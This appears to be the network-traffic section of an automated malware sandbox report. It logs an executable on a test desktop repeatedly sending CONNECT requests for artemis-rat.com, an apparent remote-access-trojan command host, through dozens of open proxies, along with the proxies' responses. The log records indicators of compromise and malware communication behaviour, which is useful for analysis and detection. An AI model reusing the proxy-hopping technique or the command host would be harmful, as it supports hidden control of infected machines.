User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:47.839514017 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:48.929788113 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:50.209650040 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:52.965766907 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:08.324042082 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:28.801558018 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:09.761943102 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1675192.168.2.554015107.180.103.214616343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.639262915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.701791048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.702013969 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1676192.168.2.553960192.64.115.90471003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.639508009 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1677192.168.2.55454791.134.140.160530123876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.641824961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405049086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.423903942 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1678192.168.2.55454258.246.58.15090023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.642366886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.960592985 CET | 311 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1679192.168.2.554550194.163.137.10690503876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.642376900 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.461102009 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1680192.168.2.55462198.181.137.8341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.645595074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1681192.168.2.55383746.209.204.14780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.646234035 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.133898973 CET | 202 | IN | HTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Wed, 06 Mar 2024 14:53:24 GMT
                                                                                                                                                                                                                                                            Expires: Wed, 06 Mar 2024 14:53:24 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1682192.168.2.55043995.84.166.13880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.646485090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1683192.168.2.55310083.212.123.11338883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.646609068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.980072021 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:48.015429974 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1684192.168.2.554574154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.652192116 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1685192.168.2.55435864.227.108.25319083876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.652193069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1686192.168.2.554516115.127.31.6680803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.653053999 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1687192.168.2.553945162.241.53.72314143876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.653278112 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.701895952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.702012062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.702050924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1688192.168.2.5545813.123.150.19231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.657740116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.964258909 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1689192.168.2.554557123.126.158.50803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.660749912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1690192.168.2.55461979.143.177.29219723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.666888952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.983716011 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1691192.168.2.554528116.199.168.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.667606115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1692192.168.2.554648167.71.5.8380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.668087006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.683559895 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1693192.168.2.554592146.59.18.246580313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.668195009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405153990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.424063921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405579090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.396033049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.343368053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.311263084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1694192.168.2.554580148.72.215.23049903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.669456959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1695192.168.2.554697104.27.83.183803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.670689106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.824985027 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1696192.168.2.5546468.142.3.14533063876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.673388004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1697192.168.2.55466191.134.140.160119463876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.673429012 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405095100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1698192.168.2.554625111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.675213099 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1699192.168.2.55051592.205.107.159572383876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.675664902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.717590094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.811321974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.892803907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1700192.168.2.554759104.19.106.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.675863028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.830290079 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1701192.168.2.55403094.23.220.136437513876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.676702976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.717497110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.811307907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.892788887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1702192.168.2.554763104.20.178.166803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.676732063 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.831700087 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


